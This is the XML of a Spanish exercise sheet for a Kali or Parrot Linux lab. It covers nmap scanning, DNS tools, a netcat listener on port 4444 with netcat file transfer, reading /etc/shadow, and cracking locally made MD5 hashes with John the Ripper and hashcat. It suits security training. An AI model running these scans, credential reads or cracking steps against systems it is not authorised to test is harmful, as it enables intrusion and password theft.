          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0716F3A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23. Escaneo rápido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D588F" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -F 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478B1D19" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="0A0733ED">
          <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE815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24. Escaneo de red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689E4119" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A343CAB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="515FCF0F">
          <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="610824C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25. Detección de servicios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10775955" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -sV 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAADB75" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6397599D">
          <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB1FF9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26. Detección de SO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA6B611" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -O 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA39A31" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4055D186">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F38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27. Escaneo agresivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A177798" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -A 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5153F575" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3753D454">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC714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28. Guardar resultados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B92A097" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nmap -oN resultado.txt 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632774A1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="26055B68">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2320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29. Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E364C2C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ping google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04152A26" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="369063CC">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFEB88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30. Ver ruta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F96915" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>traceroute google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73412F41" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5C5159BB">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BECEA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31. IP local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010A5781" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ip a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CB8EE3" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="37EC45DB">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="103555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32. Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69212687" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ip route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CFEB1B" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="7E40C41D">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B43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33. DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DD27CA" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>cat /etc/resolv.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544C36BD" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="15B07969">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADCE00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34. Test DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568A5D0E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nslookup google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520C1FF" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2E2E61C6">
          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF1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35. Alternativa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52609419" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:lastRenderedPageBreak/>
        <w:t>dig google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1E6FA7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4469BE59">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AE3B1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36. Escuchar puerto (netcat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471D26D6" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4467BEE7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="27B838DF">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B13719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37. Conectar a puerto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FAA21A" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nc 192.168.1.1 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112981E9" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="616A8300">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00697F8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38. Transferir archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4EBE4D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>nc -lvp 4444 &gt; archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E782C3" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4E30757C">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7190658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39. Ver ARP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B94D5F2" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>arp -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E08B58" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3417F1C3">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E6E0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40. Escaneo con timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E10D0B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nmap --host-timeout 30s 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBE1F83" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="15A285E8">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCBA721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🔓</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 3: CRACKING Y PASSWORDS (41–60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED75BDB" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="16F7D460">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4430F5" w14:textId="08BDF07C" w:rsidR="00AF1192" w:rsidRPr="00AF1192" w:rsidRDefault="00AF1192" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF1192">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(revisar estos ejercicios, da p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>roblemas en kali, probar en parrot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB62E12" w14:textId="77777777" w:rsidR="00AF1192" w:rsidRPr="00AF1192" w:rsidRDefault="00AF1192" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E836781" w14:textId="462F0AD3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4</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Crear carpeta de prueba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62268146" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>mkdir ~/john_prueba</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:br/>
        <w:t>cd ~/john_prueba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3A4A38" w14:textId="15BF262F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4</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Crear el hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293E46D9" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>echo "81dc9bdb52d04dc20036dbd8313ed055" &gt; hash.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:br/>
        <w:t>cat hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5530BA16" w14:textId="61289145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4</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Comprobar que John está instalado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495FD43B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lastRenderedPageBreak/>
        <w:t>which john</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>john --list=formats | head</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DA708" w14:textId="6C59E6BF" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:pPr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Pr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>4. Probar el hash MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDDE8AD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john --format=raw-md5 hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F33F79B" w14:textId="4FF60FB1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4</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Ver el resultado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AEEF71" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>john --show --format=raw-md5 hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D249EE3" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>Debería sacar la contraseña 1234.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F04655" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:pict w14:anchorId="12D0F8A3">
          <v:rect id="_x0000_i1134" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC6D283" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Para usar wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2286EF2B" w14:textId="2DC4DF21" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:pPr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Pr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>6. Buscar rockyou</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D91F69A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ls /usr/share/wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AE2B57" w14:textId="74B0C90E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4</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Si está comprimido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC187B0" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>sudo gunzip /usr/share/wordlists/rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7F5809" w14:textId="3D1E16A5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4</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Ejecutar John con diccionario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726116BA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john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B1C606" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:pict w14:anchorId="75DF31B8">
          <v:rect id="_x0000_i1135" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C068FBF" w14:textId="61914FAD" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">49. </w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Si John no está instalado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C57BBC" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>sudo apt update</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:br/>
        <w:t>sudo apt install john -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D28C41E" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>Y si quieres hashcat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF8B786" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>sudo apt install hashcat -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384AFA2D" w14:textId="4FB25894" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562"/>
    <w:p w14:paraId="0EF3D0A1" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="00206562"/>
    <w:p w14:paraId="0255E2FD" w14:textId="7A79F18B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50. HASHCAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F1BA62" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B881D77" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>Si da guerra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF433D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hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032328F2" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:pict w14:anchorId="5B30444C">
          <v:rect id="_x0000_i1150" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E67EB6" w14:textId="17BF653A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51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0398122C" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:lastRenderedPageBreak/>
        <w:t>hashid hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFDC460" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>Si no está:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51637F06" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>sudo apt install hashid -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710CF599" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:pict w14:anchorId="65B8EC80">
          <v:rect id="_x0000_i1151" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7F11D5" w14:textId="2C5823D9" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">52 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:t>Crear usuario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Y VER HASHES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC04BA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sudo useradd test</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>sudo passwd test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE2013" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>Ver hashes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39113DD6" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>sudo cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B505E82" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="00206562"/>
    <w:p w14:paraId="54E888CE" w14:textId="220B5091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53</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Generar el hash MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D52A0A" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>echo -n "admin" | md5sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BAAE5B" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>Te saldrá algo parecido a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBFA21D" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>21232f297a57a5a743894a0e4a801fc3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BB1032" w14:textId="46B46DCF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54</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Guardarlo en un archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046929F5" w14:textId="77777777" w:rsidR="002C78F8" w:rsidRPr="002C78F8" w:rsidRDefault="002C78F8" w:rsidP="002C78F8">
      <w:r w:rsidRPr="002C78F8">
        <w:t>echo "21232f297a57a5a743894a0e4a801fc3" &gt; hash2.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="002C78F8">
        <w:br/>
        <w:t>cat hash2.txt</w:t>
      </w:r>
    </w:p>
